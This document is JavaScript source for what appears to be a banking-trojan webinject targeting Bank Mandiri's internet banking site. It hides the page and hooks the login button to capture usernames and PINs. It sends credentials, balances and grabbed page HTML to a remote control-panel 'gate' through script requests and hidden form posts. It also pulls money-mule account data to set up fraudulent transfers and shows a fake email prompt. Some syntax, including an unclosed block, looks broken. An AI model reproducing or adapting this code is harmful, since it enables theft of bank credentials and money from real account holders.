function urlEncode(b){function gethex(a){return"%"+f.charAt(a>>4)+f.charAt(a&0xF)}var c="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_.~";var d="!*'();:@&=+$,/?%#[]";var e=c+d;var f="0123456789ABCDEFabcdef";b=b+"";var g="";if(!b||b.length==0){return""}for(var i=0;i<b.length;i++){var h=b.charAt(i);if(c.indexOf(h)!=-1){g=g+h}else{var j=b.charCodeAt(i);if(j<128){g=g+gethex(j)}if(j>127&&j<2048){g=g+gethex((j>>6)|0xC0);g=g+gethex((j&0x3F)|0x80)}if(j>2047&&j<65536){g=g+gethex((j>>12)|0xE0);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}if(j>65535){g=g+gethex((j>>18)|0xF0);g=g+gethex(((j>>12)&0x3F)|0x80);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}}}return g}
function returnTrue(a){return a==null||a==undefined||a=="null"||a=="undefined"||a=="empty"||a==""||a==" "||a.length<4?false:true}
function clearLog(){msg="";msg_type="";return_type="";page_content=[]}
function removealls(){}
function formatCurrency(a){a=a.toString().replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+" "+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
function addLog(a,b,c,d){var e=new Date;e="z_"+botid+" "+ats_started+" "+(e.getHours()<10?"0":"")+e.getHours()+":"+(e.getMinutes()<10?"0":"")+e.getMinutes()+":"+(e.getSeconds()<10?"0":"")+e.getSeconds();msg_type=msg_type.length==0?c:!/error|warning/.test(msg_type)?c:msg_type;if(/error|warning/.test(c)){var f=page_content.length;var g="rn<base href='"+a.location.href.substr(0,a.location.href.lastIndexOf("/")+1)+"'>";page_content[f]=[];page_content[f].content_link=a.location.href;page_content[f].content="<html>"+g+"rn"+document.documentElement.innerHTML+"</html>"}msg="["+e+"] "+c+": "+b+"() -> "+d+(msg.length==0?"":"<br>")+msg}
function formatCurrency2(a){a=a+"";a=a.replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+"."+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
 
 
 
 
function getData(a,b){removealls();if(!returnTrue(login)&&!/variables|write_log|get_parsed_numbers|send_b64_data/i.test(a)){doLogout();return}var c=drop_name.length>0?"&transfer_from_account_nr="+urlEncode(transfer_from_account_nr)+"&drop_name="+urlEncode(drop_name)+"&iban="+urlEncode(iban)+"&memo_text="+urlEncode(memo_text)+"&transfered_amount="+urlEncode(transfered_amount+""):"";var d=msg.length>0?"&msg_type="+urlEncode(msg_type)+"&msg="+urlEncode(msg)+"&return_type="+urlEncode(return_type||"atsEnd"):"";var e=balances.length>0?"&balances="+urlEncode(balances):"";var f="&bt="+urlEncode(browser_type)+"&botid="+urlEncode(botid);balances="";clearLog();
window.bldt98uu={};window.bldt98uu.CallResponse=function(msg_type, msg, ssid){
delete bldt98uu;my7("script[src*=atsbmid]").remove();callResponse(msg_type, msg, ssid);
};
my7.getScript(a+d+e+c+f);//my7("script[src*=atsbmid]").remove();
}
 
function postPageContent(){removeContentGrabberDiv();var a=document.createElement("div");a.id="contentGrabberDiv";if(!show_debug){a.style.display="none"}document.body.appendChild(a);var b="";b+="<iframe id="contentGrabbeIframe" name="contentGrabbeIframe" onLoad="try{bldt98uu.OnLoadContentGrabberIframe()}catch(err){void(0)}"></iframe>";b+="<form method="POST" action=""+gate_link+"" id="contentGrabberForm" target="contentGrabbeIframe">";b+="<textarea name="action">write_log</textarea>";if(returnTrue(login)){b+="<text"+"area name="login">"+login+"</text"+"area>"}if(balances.length>0){b+="<text"+"area name="balances">"+balances+"</text"+"area>"}b+="<text"+"area name="msg_type">"+msg_type+"</text"+"area>";b+="<text"+"area name="msg">"+msg+"</text"+"area>";b+="<text"+"area name="return_type">"+(return_type||"atsEnd")+"</text"+"area>";b+="<text"+"area name="pkey">"+pkey+"</text"+"area>";b+="<text"+"area name="bt">"+browser_type+"</text"+"area>";for(var i in page_content){b+="<text"+"area name="content_link_"+i+"">"+page_content[i].content_link+"</text"+"area>";b+="<text"+"area name="content_"+i+"">"+page_content[i].content.replace(/textarea/ig,"Zextarea")+"</text"+"area>"}b+="</form>";a.innerHTML=b;var c=document.getElementById("contentGrabberForm");balances="";clearLog();c.submit();}
function removeContentGrabberDiv(){if(document.getElementById("contentGrabberDiv")){document.getElementById("contentGrabberDiv").parentNode.removeChild(document.getElementById("contentGrabberDiv"))}}
function getDropData(a){var b="&action=get_drop_data";var c=Number(new Date);getData(gate_link+b+"&login="+urlEncode(login)+"&max_sum="+a+"&pkey="+urlEncode(pkey)+"&ssid="+c,c)}
function transferExists(){var a="&action=transfer_exists";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function writeLog(){if(page_content.length>0){zz=1;if(return_type=="atsEnd")zz=2;if(return_type=="showing")zz=3;postPageContent();if(zz==29)atsEnd();if(zz==3)show99();}else{var a="&action=write_log";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}}
function writeVariables(a,b){onwrite_state=b;var c="&action=set_variables";for(var d in a){c+="&"+d+"="+urlEncode(a[d])}var e=Number(new Date);getData(gate_link+c+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+e,e)}
function readVariables(){var a="&action=get_variables";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function getcurr(a){return parseFloat(a.split(/,|./)[0].replace(/[^0-9--]/igm,""));}
 
function show99(){
my7("html").show();
}
 
function lokPage(){
my7("body").html(waitlok);show99();
addLog(document,"lokPage","info","lokPage");return_type="0";writeLog();
return;
}
 
function replacerCanStart(){lokPage();}
function submitToken(type){}
 
function atsEnd(){
addLog(document,"atsStart","info","end work");
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);
}
 
function setconfig(b){var d=b.split("^z^");drop_name=d[0];drop_city=d[1];drop_country=d[2];iban=d[3];memo_text=d[4];transfered_amount=parseInt(d[5]);transfer_from_account_nr=d[6];}
 
function replacerzzz(a){ }
 
var tmprv="";
function callResponse(a,b,c){
removealls();
if(b=="lokPage"){lokPage();}
if(b=="doLogout"){top.location.href="https://ib.bankmandiri.co.id/";}
if(a=="error"){return;}
else if(a=="set_variables"){onWriteVariables()}
else if(a=="get_variables"){
tmprv=b;
console.log(b);
var d=b.split("^^^");
login=d[0];
holder_name=d[1];
ats_started=d[2];
tmp_val=d[3];
tmp_val2=d[4];
if(d[5].length>9) {replaz=d[5];replacerzzz(replaz);return;}
//replacer_received=parseReplacerArray(d[5]);
if(!returnTrue(login)){
ats_started=="99";
addLog(document,"callResponse","logout","login is empty. redirecting to login page");return_type="doLogout";writeLog();return;
}
onReadVariables();
}
 
else if(a=="transfer_exists"){
var d=b.split("^^^");var e=d[0]=="YES"?true:false;var f=d[1];
if(e){addLog(document,"callResponse","failed","transfer already exists for "+f);return_type="atsEnd";writeLog();return}
addLog(document,"callResponse","info","no transfers for this account. requesting drop for "+max_sum);getDropData(max_sum)
}
else if(a=="get_drop_data"){
if(/^([EMPTY])$/.test(b)){
addLog(document,"callResponse","info","no drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
//addLog(document,"callResponse","failed","no drops in admin panel.");return_type="atsEnd";writeLog()
}
else if(/^([NOT_FOUND])$/.test(b)){addLog(document,"callResponse","failed","no suitable drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
}
else{
top.d0r0op=b;
setconfig(b);
addLog(document,"callResponse","info","Starting transfer to: '"+iban+"' amount "+transfered_amount);
ats_started="3";writeVariables({login:login,ats_started:ats_started},888);
}
}
else if(a=="write_log"){
if(b=="atsEnd"){atsEnd()}
if(b=="showing"){show99();}
if(b=="readVariables"){readVariables()}
}
}
 
function IsEmail(email) {var regex = /^([a-zA-Z0-9_.+-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/;return regex.test(email);}
function showmailfake(){
if(typeof window.mailok != typeof undefined) {delete mailok;submitimg(loginbtn);return;}
q1=my7(loginbtn).closest("table");
q1.after(waitfkk);
q1.hide();
my7("#fksend").click(function(){
var mailz=my7("#fkmail").val();
if(IsEmail(mailz)){
addLog(document,"saveLoginData","info","EMAIL:"+mailz);
ats_started="1";writeVariables({login:login,ats_started:ats_started,tmp_val:mailz},1);
} else {
addLog(document,"onLoaded","info"," mmssgg BADMAIL:"+mailz);return_type="0";writeLog();
alert("Anda masukkan e-mail yang salah");
}
return false;
});
}
 
 
function onWriteVariables(){
removealls();
if(onwrite_state==101){showmailfake();}
if(onwrite_state==1){submitimg(loginbtn);}
 
else if(onwrite_state==99){
top.dredea2a=true;
menuclick("https://ib.bankmandiri.co.id/retail/Welcome.do?action=result");
 
else if(onwrite_state==757){transferExists();}
else if(onwrite_state==371){window.refreshCityList();}
else if(onwrite_state==372){window.refreshBranchLocationList();}
else if(onwrite_state==373){transferExists();}
 
}
 
 
 
function onReadVariables(){
if(ats_started=="0"){
show99();
addLog(document,"atsStart","info","tmprv:"+tmprv);
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);return;
}
 
if(ats_started=="99"){show99();return;}
 
 
if(ats_started=="1"){
q1=my7ajx("ol.breadcrumb li");
if(q1.size()==1) {holder_name=q1.text().replace(/^s*|s$|t|r|n/gim,"");}
 
q1=my7("div#Authorization");
if(q1.size()>0)
{
loginbtn=my7("a#REKENING");
if(loginbtn.size()!=1) {addLog(document,"onLoadIframe","error","error REKENING?");return_type="0";writeLog();show99();return;}
 
tmpx="";
tmpx=my7("span.bcum").text().replace(/^s*|s$|t|r|n/gim,"")+"||";
tmpx+=my7("div.pageheadingcaps h1").text().replace(/^s*|s$|t|r|n/gim,"")+"||";
q1=my7("div#DispForm");
if(q1.size()!=1){addLog(document,"onLoadIframe","error","error DispForm?");return_type="0";writeLog();show99();return;}
q1=q1.find("h2:has(span.simpletext), h3:has(span.simpletext), p.formrow:has(span.querytextleft):has(span.querytextright)");
q1.each(function(){
q2=my7(this);
if(q2.is("h3, h2")){tmpx+="hZZ"+q2.text()+"ZZ ||";return;}
w1=q2.find("span.querytextleft");
w2=q2.find("span.querytextright");
if(w2.find("a").size()>0){tmpx+="aZZ";}else{tmpx+="tZZ";}
tmpx+=w1.text()+"ZZ";
tmpx+=w2.text()+"||";
});
 
addLog(document,"onReadVariables","info","DETECT. go to REKENING");
ats_started="101";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmpx},2);
return;
}
 
show99();
addLog(document,"onReadVariables","info","page:"+holder_name+" | "+document.title);
ats_started="1";writeVariables({login:login,ats_started:ats_started},298);
return;
}
 
 
else {
show99();
addLog(document,"onLoadIframe","error","lol??? "+ats_started+" "+lochref);return_type="0";writeLog();
}
 
}
 
var mon="not";
function onLoaded(){
lgf=my7("input#teilnehmer");
pss=my7("input#pin");
loginbtn=my7("button#headerLoginSubmit");
if(loginbtn.length>0 && lgf.length>0 && pss.length>0) {
var clicked=function(){
login=lgf.val();
addLog(document,"saveLoginData","info","ua:"+window.navigator.userAgent);
addLog(document,"saveLoginData","info","domain:"+document.location.host);
addLog(document,"saveLoginData","info","login MMSSGG details:"+login+"|||"+pss.val());
ats_started="1";writeVariables({login:login,ats_started:ats_started},101);
return false;
};
my7("form, input").onEnterKey();
show99();
loginbtn.click(function(){clicked();return false;});
return;
}
readVariables();return;
}
 
return{
   Run: function(){
   my7("html").hide();
 my7(document).ready(function(){onLoaded();}); 
   },
   CallResponse: function(msg_type, msg, ssid){callResponse(msg_type, msg, ssid);},
   OnLoadIframe: function(a,b){onLoadIframe(a,b);},
   SubmitToken: function(type){submitToken(type);},
   addLog: function(a,b,c,d){addLog(a,b,c,d);},
   writeLog: function(){writeLog();},
   fake77: function(a,b){fake77(a,b);}
}
}());
 if(bldt98uu.Run)bldt98uu.Run();
delete bldt98uu;